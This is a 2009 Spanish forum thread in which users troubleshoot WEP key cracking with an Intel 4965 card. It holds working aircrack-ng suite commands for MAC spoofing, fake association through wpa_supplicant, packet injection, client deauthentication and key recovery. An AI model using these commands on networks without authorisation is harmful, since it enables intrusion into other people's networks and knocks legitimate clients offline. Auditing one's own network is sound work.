lo k me pasa ami es k me tarda un cojon a k pille los APs
Título: Re: Inyectar con 4965
Publicado por: ahir en 08-01-2009, 16:52 (Jueves)
Me gustaría saber si oficialmente ya se puede inyectar y obtener capturas con la intel 4965 y con que versión de auditoría la realizais?
Muchas gracias
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 08-01-2009, 18:23 (Jueves)
A que te refieres oficialmente?, yo lo hago con wifiway 1.0 final porque ya viene todo preparado, y si, se inyecta y se obtienen capturas, pero no, la asociacion hay que hacerla con el wpa suplicant  ;)
Título: Re: Inyectar con 4965
Publicado por: ahir en 08-01-2009, 20:55 (Jueves)
Vale gracias, a eso me referia, a si había una auditoría que viniera ya algo adecentada para las 4965 y no haya que cambiar los drivers por la otra ni cosas así pues yo no estoy mu puesto, voy a intentar seguir los pasos que habeis seguido que en este tema esta muy bien explicado y ya os comento!
Saludos!
Título: Re: Inyectar con 4965
Publicado por: ahir en 09-01-2009, 14:38 (Viernes)
No consigo asociar con el wpa supplicant tampoco he visto ningun manual que lo explique, alguien me puede decir como creo el wpa.conf?
Gracias
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 09-01-2009, 14:41 (Viernes)
Citar
Como  realizar la asociación usando wpa_supplicant:
Citar
La asociación pues, debemos realizar con wpa_supplicant de la siguiente manera:
- Primero debemos crear un fichero con la siguiente estructura:

Código:
network={
        ssid="ESSID"
        key_mgmt=NONE
        bssid=BSSID
        wep_key0="232323343478787"
}
Rellenamos los campos de ESSID y BSSID con los datos de nuestra red wifi. El campo de wep_key no hace falta cambiarlo, pues es una clave cualquiera.

Después lanzamos en consola:


Código:
sudo wpa_supplicant -c/home/dexterback/wpa.conf -Dwext -iwlan0

/home/dexterback/wpa.conf no hace falta decir que es la ruta... pero fijaros que el "-c" va "enganchado", no es ningún error.
Os saldrá un mensaje diciendo que se ha conectado al BSSID, importante no cerrar esta consola, ya que si se cierra se pierde la asociación.

Después ya hay que hacer los pasos típicos... y lanzar el ataque que uno quiera.

A mi de esta manera me funciona 100%, me inyecta alrededor de los 400pps, y en 3min o asi se consigue la key.

Espero que sirva de ayuda a la gente, y sobre todo tener en cuenta que la ASOCIACIÓN NO FUNCIONA CON AIREPLAY-NG, hay que realizarla con wpa_supplicant.

primer post del hilo ...  ^-^ ^-^

Saludos
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 09-01-2009, 14:50 (Viernes)
Me podeis decir porq al ejecutar el aircrack me aparece esta pantalla de abajo a la izquierda??

(http://img396.imageshack.us/img396/8297/instantnea1ft9.th.jpg) (http://img396.imageshack.us/my.php?image=instantnea1ft9.jpg)

Se me queda pillado en ella haciendo cosas pero no me da la clave de la wifi. Como veis en la captura por Datas no sera porq tengo muchos pero no se porq me pasa eso. Utilizo el aircrack-ng y me aparece eso y si pongo aircrack-ptw me dice this is de version 1.0 for aircrack-pwt. For more infomation...... pero tampoco me da la clave. Me podeis ayudar??

Un saludo.

Título: Re: Inyectar con 4965
Publicado por: ahir en 09-01-2009, 15:02 (Viernes)
Gracias chinitiw ya había visto el post, pero mi duda es como crear el fichero, a donde le doy, como lo guardo.. que mis conocimientos no son muy altos.
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 09-01-2009, 15:07 (Viernes)
con el botón derecho crear nuevo archivo ...  ;)
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 09-01-2009, 15:11 (Viernes)
jajaja, manejando auditorias wireless sin saber como crear un archivo XD.

Calvin2sr pon la sintaxis completa que usas para el aircrack  ;)
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 09-01-2009, 15:26 (Viernes)
el comando q pongo es:
aircrack-ng /root/diego.cap
diego.cap es el archivo del airodump en el q guardo todo para luego saber la clave.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 09-01-2009, 15:29 (Viernes)
Veras hay un problema en el aircrack-ng y es que a veces entra en un bucle infinito, te pone el numero de keys totales? o simplemente van subiendo, si es asi borra el archivo .cap y vuelve a inyectar ;)
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 09-01-2009, 15:31 (Viernes)
o prueba aircrack-ptw ...

saludos
Título: Re: Inyectar con 4965
Publicado por: ahir en 09-01-2009, 15:32 (Viernes)
Gracias por la aclaración chinitiw, no pasaría esto si la gente no lo explicara mal y encima se dedica a reirse del resto...ni que fueras el p.. amo.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 09-01-2009, 15:34 (Viernes)
No creo haberte faltado el respeto en ningun momento, solo aclaré que es extraño saber como realizar auditorias pero no saber crear un archivo, ni soy una figura representativa en a.w ni tengo intencion de serlo, aqui solo se intenta ayudar, asique ahorrate los comentarios despectivos  ;)
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 09-01-2009, 15:34 (Viernes)
Si, es como si me quedase en un bucle infinito. Eso porq lo hace?? hay otras veces q me da la clave al instante pero otras me da el bucle ese infinito y tengo q volver a inyectar con el aireplay-ng y esperar a q me coja los paquetes. Con el ptw me da un mensaje de this is de version 1.0 of aircrack-ptw o algo asi pero no me da la clave tampoco. De q puede ser??

Un saludo.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 09-01-2009, 15:37 (Viernes)
No se porque es, a mi tambien me a pasado bastantes veces, lo pregunté en un post, donde dexter ponia la sintaxis correcta para el ptw, aver si lo encuentro y te paso el link ;)
Título: Re: Inyectar con 4965
Publicado por: ahir en 09-01-2009, 15:39 (Viernes)
LLevo dos años utilizando auditorias, con las explicaciones y tutoriales que me dieron, era una intel 3945, y no había que crear ningún archivo para poder inyectar todo había que hacerlo en el terminal, por lo que si esto es algo nuevo yo y muchas personas que venímos de la 3945 desconoceran..
Solo he preguntado como se creaba el archivo pues no lo había visto anteriormente, por lo que no te rias si pregunto yo eso.. todo el mundo aprende preguntando y probando al igual que te ocurriría a ti al principio.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 09-01-2009, 15:49 (Viernes)
Si con principio dices ace nada si, porque lo sigo siendo, y no era una risa despectiva, simplemente me parecia raro, tampoco hace falta ponerse asi  >:( >:( >:(
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 09-01-2009, 15:53 (Viernes)
Me estan diciendo q es un problema de la version del aircrack q viene con el wifiway. Me podeis decir como instalar otra version del aircrack q no dea ese error en el live cd de wifiway y de donde conseguirla?? Gracias.

Un saludo.
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 09-01-2009, 16:34 (Viernes)
Si, es como si me quedase en un bucle infinito. Eso porq lo hace?? hay otras veces q me da la clave al instante pero otras me da el bucle ese infinito y tengo q volver a inyectar con el aireplay-ng y esperar a q me coja los paquetes. Con el ptw me da un mensaje de this is de version 1.0 of aircrack-ptw o algo asi pero no me da la clave tampoco. De q puede ser??

Un saludo.

Eso creo que es porque no lo estais haciendo de la manera correcta , lo he hecho con el wifiway , sin cambiar nada por lo que entiendo que algo hareis mal , pero si os resulta más facil lo que podeis hacer es en una terminal tecleais aircrack-ptw y luego en el "explorador de ficheros" arrastrais el archivo a descifrar sobre la consola y listo ( a veces se hace la picha un lio con las rutas)

Saludos
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 09-01-2009, 17:22 (Viernes)
si pongo aircrack-ptw me pone:
this is de aircrack-ptw 1.0 version. for more information... y me sale. No se queda ejecutando nada
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 09-01-2009, 17:24 (Viernes)
aircrack-ptw ruta_al_archivo.cap   ^-^ ^-^

Título: Re: Inyectar con 4965
Publicado por: ahir en 09-01-2009, 17:26 (Viernes)
Hola chicos ya he probado y me ha funcionado correctamente, tengo una duda, en el caso de haber algún cliente conectado no debo realizar el A0?? también me gustaría saber porque en algunas redes, en los ataques sin clientes A3 solo suben los beacons, lee los paquetes pero nada de datas..
gracias.
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 09-01-2009, 17:34 (Viernes)
muy fácil poruqe el A1 + A3 no siempre funciona o puede tardar muchasss hora en funcionar, pero una cosa lo de en muchas redes no me gusta nada ( si no son tuyas o no tienes permiso para poder usarlas) ... ojito ... ^-^

saludos
Título: Re: Inyectar con 4965
Publicado por: ahir en 09-01-2009, 17:39 (Viernes)
Oks, gracias, una es la mia, la que he sacado.. la otra con la que he probado es el bar que tengo debajo de mi casa,( el cual ya tengo la contraseña y conozco al dueño) y no ha funcionado, pues abre a las 6 y no tendrá clientes conectados, por eso probare luego y no se si debo realizar un A0 o no.. asi que ya probare a ver.
Gracias por toodoo!
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 09-01-2009, 17:46 (Viernes)
Pues ahora he probando con el winaircrack y me aparece esto.

(http://img512.imageshack.us/img512/6382/capturaio6.th.jpg) (http://img512.imageshack.us/my.php?image=capturaio6.jpg)

 Puede q sea del archivo .cap q no coja bien los IVS??? Si hago un aircrack-ptw archivo.cap no me hace nada. Me pone lo de la version y la informacion y sale.

EDIT: Por cierto inyectar lo hago con el comando
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (mac) -h 00:11:22:33:44:55 mon0
ya que es el unico q me funciona a la hora de q me suban los data de la conexion q quiero conseguir la clave. Con el comando
aireplay-ng -3 -b MAC DEL AP -h 00:11:22:33:44:55 mon0
solo me funciona cuando hay almenos otro cliente conectado a esa wifi.
Puede ser q no inyecta bien con ese comando y no coje bien los IVS??

Un saludo.
Título: Re: Inyectar con 4965
Publicado por: *dudux en 09-01-2009, 18:45 (Viernes)
si ptw no te la da.......

usa ng tocando opciones.........aircrck 2.3?
usa ng

aircrack -x1 *.cap
  "            -x2  *.cap

aircrack -f 1  *.cap
aircrack -K *.cap
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 09-01-2009, 19:52 (Viernes)
Me podeis mandar un archivo .cap q estea bien para saber si es del programa o es del archivo mio q esta mal?? Puede q el aircrack al coger el .cap y este no tener los suficintes datos como para obtener la clave se vuelva loco, quiero decir q me haga el bucle ese infinito y nunca me salga??

Un saludo.
Título: Re: Inyectar con 4965
Publicado por: biyonder en 10-01-2009, 14:50 (Sábado)
Vale parece que me funciona, pero tengo un problema. Cuando, despues de asociar, lanzo aireplay no me captura ningun paquete ARP, y eso es chungo porque entonces el cracking de mi clave es muy chungo, tardaría mil. ¿Por que no capturo paquetes ARP y si se puede hacer algo para hacer que genere packets?
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 11-01-2009, 02:38 (Domingo)
Porq al ejecutar este comando a veces me va bien y a veces se me queda leyendo paquetes pero sin ponerme el mensajito de usar este conjunto de datos para inyectar paquetes a la conexion en cuestion??? Ya no se si falla la tarjeta o de q es.

(http://img394.imageshack.us/img394/1713/instantanea34gc2.th.jpg) (http://img394.imageshack.us/my.php?image=instantanea34gc2.jpg)

Un saludo.
Título: Re: Inyectar con 4965
Publicado por: ahir en 11-01-2009, 13:52 (Domingo)
Eso me pasa a mi también, pero me parece que hay algunas redes que ocurre eso al no haber clientes conectados.. si hubiera clientes si que pillaria paquetes..
no obstante con que hagas el aireplay-ng -3 -b MAC -h 00:11:22:33:44:55 mon0 es suficiente, por lo menos a mi, si no me suben paquetes de ahí con ese ataque no me resuelve tampoco nada.
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 11-01-2009, 14:03 (Domingo)
recordad que los ataques sin clientes no siempre funcionan ...  ^-^

Saludos
Título: Re: Inyectar con 4965
Publicado por: biyonder en 11-01-2009, 14:10 (Domingo)
yo lo hago con cliente, pero nada se queda en got 0 packets siempre
Título: Re: Inyectar con 4965
Publicado por: ahir en 11-01-2009, 14:16 (Domingo)
Si tienes un cliente conectado y no te suben los datas haz:

aireplay-ng -0 1 -a MAC DEL AP -c MAC DEL CLIENTE mon0

y te tienen que empezar a subir..
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 11-01-2009, 14:47 (Domingo)
Pero entonces porq pasa eso? porq en una misma red sin clientes a veces si q me deja enviar trafico y a veces no con el aireplay -2 ........??

Un saludo.
Título: Re: Inyectar con 4965
Publicado por: biyonder en 11-01-2009, 22:59 (Domingo)
ahir nada, hice eso que me dijiste y nada, no empiezan a subir. Lo deje un tiempo a ver si subian pero que va. No se que puede pasar :S
Título: Re: Inyectar con 4965
Publicado por: ahir en 12-01-2009, 11:50 (Lunes)
Pues ahora ya no se que puede pasarte, pero a mi siempre que tengo un cliente conectado, hago la desautentificación de ese cliente y automáticamente comienzan a subir los datas. De hecho es la mejor opción para sacar la clave, que un cliente esté conectado.

Me extraña que no te suban los datas, seguro que pones en el lugar correcto las macs?? primero la del punto de acceso y después la del cliente.

Saludos
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 12-01-2009, 17:53 (Lunes)
Puñetero aircrack XD, no funciona de ninguna de las maneras, ni usando todas las opciones, se mete siempre en un bucle infinito, y eso que tengo 102.250 ivs  :'( :'( :'(
Título: Re: Inyectar con 4965
Publicado por: wannabe en 12-01-2009, 23:18 (Lunes)
He modificado el airoscript para los usuarios de esta tarjeta, he echo que la asociación sea haga mediante el wpa_supplicant y no el aireplay -3.
El archivo wpa.conf también lo crea automáticamente,así que no debería haber ningún tipo de interacción.

Tambien he creado otro pequeño script ,más simple que automaticamente hace todo los pasos,aunque la forma interactiva creo tiene algun bug; pero definiendo las variables al abrir el fichero:

Código: [Seleccionar]
#####################################
#Definir datos predefinidos

bssid="00:18:18:FF:FF:FF"
essid="prueba"
canal="12"


parece que funciona (tampoco lo he testeado muy a fondo y cabe decir que si tu interfaz no es "wlan0" hay que ahcer unas pequeñas modificaciones)

Aquí el link con los 2 scripts:

http://www.megaupload.com/es/?d=F80L1MAW (http://www.megaupload.com/es/?d=F80L1MAW)
Título: Re: Inyectar con 4965
Publicado por: calvin2sr en 13-01-2009, 01:58 (Martes)
Ami el aircrack con bastantes datas 200000 se me queda en un bucle infinito tambien. Los datas me suben con el comando aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF:-b (mac del AP) -h 00:11:22:33:44:55 mon0
Puede ser porq no tenga los suficientes datas?? es q el archivo .cap ya me ocupa bastante 500 MB y no tengo suficiente espacio mas para el.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 13-01-2009, 16:50 (Martes)
No se que a pasado, pero, por lo menos a mi, y en este caso, añadiendo -z al aircrack, me a funcionado  >:( >:( >:( >:( >:(
Título: Re: Inyectar con 4965
Publicado por: bolero87 en 14-01-2009, 01:10 (Miércoles)
hola, he conseguido sacar la clave wep y me ha obtenido la siguiente 14:EF:B6:87:14 pero en mi aircrack no me sale la conversion a ascii. Me hariais un gran favor si me dijeseis cual es la clave que he obtenido en ascii que yo no consigo saber cual es. Muchas gracias!!
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 14-01-2009, 13:43 (Miércoles)
De donde es esa clave?  :(, porque es muy corta, es posible una clave wep con 5 digitos?  ^-^
Título: Re: Inyectar con 4965
Publicado por: wannabe en 14-01-2009, 13:55 (Miércoles)
Prueba poniendo esa misma clave sin los ":"
Código: [Seleccionar]
14EFB68714
Título: Re: Inyectar con 4965
Publicado por: bolero87 en 14-01-2009, 21:30 (Miércoles)
Nada, debe ser que la clave que me a dado el aircrack no es la correcta. No se cual sera la razon por la que me habrá dado esa clave.Gracias de todos modos!
Título: Re: Inyectar con 4965
Publicado por: wifiwork en 18-01-2009, 01:08 (Domingo)
He estado probando con la tira de comandos que decis y funciona por así decirlo cuando le da la gana.  ^-^

Aguien sabe decirme porque no sigue un patrón lògico?

que quieren decir los diferentes -"numero" del parametro del aireplay-ng?

Título: Re: Inyectar con 4965
Publicado por: ahir en 18-01-2009, 01:22 (Domingo)
Hola, wifiwork, la verdad que tienes razón, va como le da la gana, si lo pillas perezoso ahí lo tienes sin pillar ningún data, pero cuando le da sube muy rápido, a mi entrono a 450 pps.. y la encuentra en nada...

los numeros significan tipos de ataques que se realizan al router, si quieres saber a cual corresponde cada uno mira este tema (https://foro.seguridadwireless.net/nueva_generacion_wireless/varios_metodos_de_ataque-t3154.0.html), en el segudo mensaje los explica todos.

Saludos
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 18-01-2009, 10:59 (Domingo)
He estado probando con la tira de comandos que decis y funciona por así decirlo cuando le da la gana.  ^-^

Aguien sabe decirme porque no sigue un patrón lògico?

que quieren decir los diferentes -"numero" del parametro del aireplay-ng?



Guía Completa Aircrack-ng
http://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html
Título: Re: Inyectar con 4965
Publicado por: wifiwork en 18-01-2009, 18:32 (Domingo)
dios  :D ;si hay que modificar el comando aireplay-ng en cada caso y aqui la mayoria haciendo solo con -3

 porque ahora hay que hacer siempre el fichero wpa.cof y hacer luego el wpa_suppllicant? antes no se hacia.

porque hacer el macchange si luego no se hace el ataque de autentificacion falsa? si se esta haciendo con el -3 es que "se sabe" que hay cliente conectado...

Título: Re: Inyectar con 4965
Publicado por: wifiwork en 18-01-2009, 21:52 (Domingo)
me parece que al hacer el wpa_supplicant se esta haciendo un ataque sin clientes y te metes tu como cliente con la mac fakeada. ya que al intentar hacer el ataque manualmente con -1 30 (cada 30 segundos) luego no puedo reasociar el wpa_suplicant.

es mas al hacer el wpa_supplicant en el airdump-ng aparece un cliente con mi mac fakeada

que es mejor hacerlo con el fichero o abrir en otra consola y darle otro aireplay con -1?
Título: Re: Inyectar con 4965
Publicado por: bolero87 en 19-01-2009, 19:58 (Lunes)
Hola
Otra vez me dio la misma clave, no se porque es. Podria ser porque necesite mas IVs?Consegui 200000. Es que la clave es un poco rara no??
Gracias!
Título: Re: Inyectar con 4965
Publicado por: supersepo en 19-01-2009, 23:55 (Lunes)
No hay manera que me funcione, pude conseguir inyectar pero cuando lo hacia solo consegui unos 500 arps durante 30 min...

Eso es malo XD

Ahora que estoy en casa, he seguido la misma guia y ni me inyecta.

Alguna pista? =(
Título: Re: Inyectar con 4965
Publicado por: ahir en 21-01-2009, 00:04 (Miércoles)
Hola, bolero87 la contraseña es esta: 14EFB68714, por narices, a mi me ha dado alguna así también y me ha funcionado.

supersepo, ¿tienes algún cliente conectado a la red?, prueba a asociar un cliente al router, si sigue sin funcionar metele una desautentificación:

aireplay-ng -0 1 -a MAC DEL ROUTER -c MAC DEL CLIENTE mon0

y ya te tendría que subir..
Título: Re: Inyectar con 4965
Publicado por: Xav0 en 24-01-2009, 13:29 (Sábado)
hola, e leido todos los pasos de los manuales i e llegado asta el final, de lujo sin problemas...
esoy probandolo con mi router para saber si consigo saber acerlo al 100% pero resulta que el campo DATA no aumenta casi.. sube muy lento y eso que estoy al lado.. me e movido x la casa y nada.. muy muy lento... ARP no recibo casi, o parece que no se mueve....
alguna solucion?
sinembargo recibo mas ivs de otras redes de la que no quiero nada.. es decir, manda mas datos a otros routers antes de al que yo le e dixo.. :S
10min i el #Data en 1... :S i en otras redes que pilla sube como la espuma..
entro en la config del router, i en usuarios activos me veo como 00:11:22... asi que parece que todo lo e exo bien.. :S

pasos que e seguido:

1º ifconfig wlan0 down
2º macchanger -m 00:11:22:33:44:55 wlan0
3º ifconfig wlan0 up
4º iwlist wlan0 scan
5º airmon-ng start wlan0 CHANNEL
6º modifico el wpa.conf
7º wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0
8º airodump-ng -w dexter-back -c CHANNEL mon0
9º aireplay-ng -3 -b MACDELAP -h 00:11:22:33:44:55 mon0
Título: Re: Inyectar con 4965
Publicado por: ahir en 24-01-2009, 16:41 (Sábado)
Hola Xav0, como ya hemos comentado en otros posts hay muchos routers que no si no hay ningún cliente conectado no te dan ningún data o puede tardar horas hasta que los suba como la espuma.

Si tienes otro ordenador por casa prueba a conectarte a la red, y con el otro que está funcionando el wifiway, al llegar al último paso que haces haz este también:

aireplay-ng -0 1 -a MAC DEL ROUTER -c MAC DEL CLIENTE (no 00:11:22, sino la del pc conectado) mon0

y ya te tendría que subir los datas sin problemas.

Prueba a ver y nos comentas ok?
   
Título: Re: Inyectar con 4965
Publicado por: Xav0 en 24-01-2009, 16:52 (Sábado)
el inconveniente es que no tengo 2 portatile,s tengo 2 sobremesas i 1 portaitl..
serviria con un sobremesa?
i con una psp?

independientemente de que funcione o no... es un poco mierda si tengo que saber la mac de un cliente conectado no? ya me entendeis....
Título: Re: Inyectar con 4965
Publicado por: ahir en 24-01-2009, 19:35 (Sábado)
Creo que si que tendría que funcionar.
Claro que la puedes saber las macs de los clientes conectados, en la pantalla de wifiway (airodump), (http://www.son.web.id/wp-content/uploads/2007/07/airodump-ng2.jpg)

Tendrás que fijate en las stations de abajo, y tienen que tener la misma bssid, pero lo que cambian son los station, por lo que una station siempre será la tuya 00:11:22, y si ves que hay otras station con la misma bssid de tu red, esas son los clientes que estan conectados por lo que tendras que copiar las macs para desautentificarlos.
Título: Re: Inyectar con 4965
Publicado por: Xav0 en 24-01-2009, 20:09 (Sábado)
Ok aora probare entonces..
El problema es que si no hay otro cliente conectado y validado no sacas una mierda no? xD

E probado con el router de mi amigo, si estamos los 2 juntos probando esto y me a dejado obiamente para que sepamos acerlo.. y nada, tambien recibe 0 Data y 0 ARP....

emos seguido tambien el videotutorial de
del 1º post de este hilo y nada...

en fin.. creo que algo falla.. :S si en todos los routers "nuestros" vamos a necesitar que haya gente conectada vaya tela...
Título: Re: Inyectar con 4965
Publicado por: ahir en 24-01-2009, 21:41 (Sábado)
Hombre, todos todos no ocurre eso, pero muchos si, es un tema muy hablado, pero los router más o menos nuevos vienen ya de fabrica protegidos a este ataque (sin clientes).

También decirte que esperes un rato que hay muchos que no suben al instante sino que les cuesta más, a mi por lo general hasta 2h me ha tardado en enganchar.

Lo más fiable lo de que haya clientes conectados, eso nunca me falla.

Lo mejor para ir viendolo es hacer muchas muchas pruebas.

Ya nos contarás como te ha ido. Por aquí estaremos.
Saludos.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 24-01-2009, 23:57 (Sábado)
Os habeis saltado la parte de SI! Se puede inyectar sin clientes asociados, no siempre, pero se puede, y por supuesto viene aki http://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html 1 saludo  ;)
Título: Re: Inyectar con 4965
Publicado por: Xav0 en 25-01-2009, 14:01 (Domingo)
Efectivamente, si conecto la psp. obtiene pps, data i demas al instante.. i si lo ago solo a tardado como 30min hasta empezar a obtener data i pps i demas, luego el aircrack con -z super radpido.
muxas gracias a todos, merece la pena esperar 30 min xD ;)
Título: Inyectar con 4965
Publicado por: eltha en 26-01-2009, 11:52 (Lunes)
Buenas a todos.
Me gustaria hacer una pregunta: ¿Es posible enlazarse con la 4965 a una WPA? Es que ya lo intente varias veces con mi router, pero no me funciona. Sigo los pasos que se han descrito y, por lo menos con las WEP me funciona casi siempre, pero con las WPA como que no consigo nada. Y otra cosa, en caso de poderse, ¿que comando de aircrack se usaria?
Gracias adelantadas y perdon si ya se hablo en otros post pero es que no encontre mucha informacion.
Título: Re: Inyectar con 4965
Publicado por: metalero en 27-01-2009, 11:08 (Martes)
Buenas a todos.
Me gustaria hacer una pregunta: ¿Es posible enlazarse con la 4965 a una WPA? Es que ya lo intente varias veces con mi router, pero no me funciona. Sigo los pasos que se han descrito y, por lo menos con las WEP me funciona casi siempre, pero con las WPA como que no consigo nada. Y otra cosa, en caso de poderse, ¿que comando de aircrack se usaria?
Gracias adelantadas y perdon si ya se hablo en otros post pero es que no encontre mucha informacion.
eltha, leete este post: https://foro.seguridadwireless.net/live_cd_wifiway_10_renovation_kde/problemas_al_intentar_conectarme_en_redes_con_cifrado_wpawpa2-t18005.0.html
Yo me conecto perfectamente a mi router con wpa2 y ccmp, solo tienes que crear el archivo wpa.conf con los datos de tu red.

Saludos.
Título: Re: Inyectar con 4965
Publicado por: eltha en 28-01-2009, 01:16 (Miércoles)
Gracias, pero creo que eso no es exactamente lo que yo buscaba. Lo que me referia era para intentar el handshake para intentar descifrar la clave, ya que el led del wifi parpadea incluso si mi portatil no esta conectado, para ver si la nueva clave que le ponga sera mucho mas dificil.
Muchas gracias por la respuesta anterior, espero sacar algo de informacion clara para mi ^^
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 28-01-2009, 14:28 (Miércoles)
Em...esto? https://foro.seguridadwireless.net/live_cd_wifiway_10_renovation_kde/sacando_wpa_con_la_nueva_distro_10_final_con_tkiptunng-t17937.0.html
Título: Re: Inyectar con 4965
Publicado por: eltha en 28-01-2009, 15:48 (Miércoles)
Ya lo lei y lo intente pero ni con eso, a lo mejor es cosa de mi tarjeta... bueno, es igual, ya saldra al final algo  :D Bueno, muchas gracias por la ayuda  ;D
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 28-01-2009, 18:30 (Miércoles)
Ya lo intentaste pero cual es tu fallo?  :-\, donde te quedas
Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 29-01-2009, 15:26 (Jueves)
hola a todos,

Sigo teniendo problemas de inyecion con el wifiway 1.0 y la 4965.

De hecho, el test de inyeccion de aireplay-ng lo pasa correctamente pero cuando desde airoscript intento inyectar usando un cliente conectado, inyecta pero los data no suben; en cambio haciendo el mismo procedimiento con ubuntu con kernel 2.6.26 si que suben.

A vosotros os suben los data?

Me podéis decir los pasos que seguís a partir de estar cargado el wifiway hasta hacer el ataque de inyección con airoscript a ver si es que hago algo mal?

Habéis tocado algo de /etc/modprobe.d/options? Con versiones superiores , no se si de kernel o driver, he leido que en vez de iwl4965 el driver ahora es iwlagn con la cual cosa en el options sería:

options iwlagn swcrypto=1
options iwlagn disable_hw_scan=1

Alguien me puede decir si estos parametros tienen que estar o no o si hay alguno más que me dejo?

Gracias.

Título: Re: Inyectar con 4965
Publicado por: eltha en 29-01-2009, 16:15 (Jueves)
Buenas.

A Kyocarlos:
A mi casi siempre me funciona lo que se a dicho aqui pero solo para las WEP, de hecho yo uso un usb y me funciona como el cd, pero con la ventaja de que llevo los pasos que hay que hacer en un .txt para que no se me olvide nada ;D yo lo recomiendo, y asi de camino si tienes problemas puedes hacer anotaciones sin perderlas  8)

A Bht Sata:
La cosa es que se enlaza cuando le da la gana, y cuando lo consigue me suben un poco los DATA pero ni handshake ni ná de ná... es igual, a lo mejor un dia encuentro la respuesta mientras busco un coche por internet, aparecera la respuesta cuando le de la gana  ;D

Un saludo y gracias
Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 29-01-2009, 17:41 (Jueves)
eltha,

El ataque que te funciona a tí es con el wpa_supplicant, no?

Yo me estoy refiriendo a ataque con cliente conectado, en el cual no sería necesario usar lo de wpa_supplicant. Esto es lo que me gustaría que alguien me confirmara.

Lo pregunté hace tiempo y no he tenido respuesta todavía.

Alguien ha conseguido inyectar con un cliente conectado sin el wpa_suplicant?

Dexter Back has probado tu lo que digo? Mira el post que puse 2 posts más arriba de este.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 29-01-2009, 19:30 (Jueves)
Lo estas haciendo desde airoscript, lo has probado por terminal?
Título: Re: Inyectar con 4965
Publicado por: eltha en 29-01-2009, 20:04 (Jueves)
Kyocarlos, creo que no es posible con un cliente, de todas formas mañana por la mañana espero poder responderte... pero creo recordar que no porque a mi tampoco me servia cuando mi router tenia clave WEP, pero es cuestion de intentarlo otra vez  ;) ... otra opcion seria seguir los pasos y en vez de ponerte de mac 00:11:22:33:44:55 te pusieras la del cliente conectado, pero ya no se si te servira, lo pruebo y mañana te comento (si puedo antes mejor).

Saludos ^^
Título: Re: Inyectar con 4965
Publicado por: eltha en 30-01-2009, 21:49 (Viernes)
Antes de nada, saludos a todos los lectores  ;D

Ya intente lo que pregunto kyocarlos y a mi por lo menos no me sirvio, tuve que hacer el supplicant para que sirviera, eso si, puse la mac del cliente que tenia asociado el router y os comento porque me paso algo realmente raro...
Se asocio perfectamente y el airodump capturaba como siempre, pero en el momento de hacer el ataque no se porque se corto de pronto, como si nadie estuviera navegando por internet... la verdad es que a mi me sorprendio un monton porque no debe ser normal, pero no se... despues tuve que reiniciar porque ya no me inyectaba. No se si a los demas les pasara lo mismo, quizas hice algun paso mal, todo es posible. Espero haber respondido a tu duda, si no, pues postealo y tratare de hacerlo de otra forma.

Saludos ^^
Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 31-01-2009, 01:20 (Sábado)
Que alguien lo confirme pero parece ser que, según eltha, el ataque contra un cliente conectado directamente con aireplay-ng -3 no funciona con kernel 2.6.27.X, no? Pero si, si usas wpa_supplicant con la ip del cliente conectado

Insisto en que alguien más lo confirme para saber que no nos estamos olvidando de configurar algo más.

Yo en concreto lo probé con Wifiway 1.0 final instalado y con Ubuntu intrepid que lleva el mismo kernel creo.

Título: Re: Inyectar con 4965
Publicado por: kyocarlos en 01-02-2009, 14:45 (Domingo)
hola a todos,

Parece que he encontrado la solución:

El problema para kernels 2.6.27.x es que no cualquier version del compat-wireless vale. De hecho, existen 2 ramas diferenciadas: la nueva y la old. En particular, en mi ubuntu, había instalado uno de enero de 2009 de la saga nueva y parece ser que no va cualquiera de la saga nueva aunque aireplay-ng -9 reporta que la inyección funciona.

Buscando por google he visto que la versión que inyecta correctamente es la del 31-10-2008. Así es posible inyectar directamente con aireplay-ng sobre un cliente conectado en ubuntu Intrepid con kernel 2.6.27.11 y creo que debería ser igual para kernels 2.6.27.X como wifiway

Habría que tener en cuenta que las opciones siguientes tienen que estar pruebas en /etc/modprobe.d/options:

options iwlagn swcrypto=1
options iwlagn disable_hw_scan=1

A ver si podemos saber qué version del compat-wireless hay instalada en el wifiway 1.0 final y si las opiones que pongo arriba están activadas.

Espero que esta información os sirva a los que tenéis problemas.
Título: Re: Inyectar con 4965
Publicado por: Darude en 09-02-2009, 01:27 (Lunes)
no existe algun manual con todos los pasos exactos sobre que se tiene que hacer??? Intente hacer lo del video y segui todo como se debia pero al final no obtuve la clave. No habra algun manual? Saludos.
Título: Re: Inyectar con 4965
